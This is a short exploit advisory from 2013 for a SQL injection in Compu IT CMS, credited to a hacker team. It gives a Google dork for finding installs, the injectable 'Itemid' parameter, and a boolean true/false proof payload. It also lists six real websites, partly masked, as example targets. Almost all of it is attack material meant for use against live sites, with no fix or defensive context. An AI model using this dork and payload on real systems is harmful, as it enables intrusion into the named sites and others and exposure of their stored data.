####################################################### # # [+] Exploit Title: Compu IT CMS SQL Injection Vulnerability # [+] Google Dork: intext:"Developed by: Compu IT" # [+] Date: 29-07-2013 # [+] Exploit Author: Iranian_Dark_Coders_Team # [+] Home: http://wWw.IDC-TeaM.NeT # [+] Discovered By : Black.Hack3r # [+] Category: WebApp,Remote # [+] Vendor Homepage: http://www.compuitgh.com # [+] Tested on: Windows 7 # ####################################################### # # [+] Exploit: # # [+] http://localhost/[path]/index.php?opt=contents&Itemid=[SQLi] # ####################################################### # # [+] Proof: # [+] http://localhost/[path]/index.php?opt=contents&Itemid=3+and+1=1-- >> True # [+] http://localhost/[path]/index.php?opt=contents&Itemid=3+and+1=2-- >> False # ####################################################### # # [+] For example : # # [+] http://www.comXuitgh.com/index.php?opt=contents&Itemid=3 # [+] http://www.ddpXdoor.com/index.php?opt=contents&Itemid=1 # [+] http://infoXspr.org/index.php?opt=contents&Itemid=8 # [+] http://www.sXenghanacancerfoundation.com/index.php?opt=contents&Itemid=3 # [+] http://www.sgXcltd.com/index.php?opt=contents&Itemid=3 # [+] http://www.X.com/index.php?opt=contents&Itemid=2 # ####################################################### # # [+] Discovered By : Black.Hack3r # [+] We Are : M.R.S.CO,Black.Hack3r,N3O,UB313 # [+] SpTnx : Mr.Cicili,Sec4ever,shahram black hat,C@M!S3Я_H3X,@3is,HOt0N,All Members In wWw.IDC-TeaM.neT/cc # [+] Home : http://wWw.IDC-TeaM.neT # #######################################################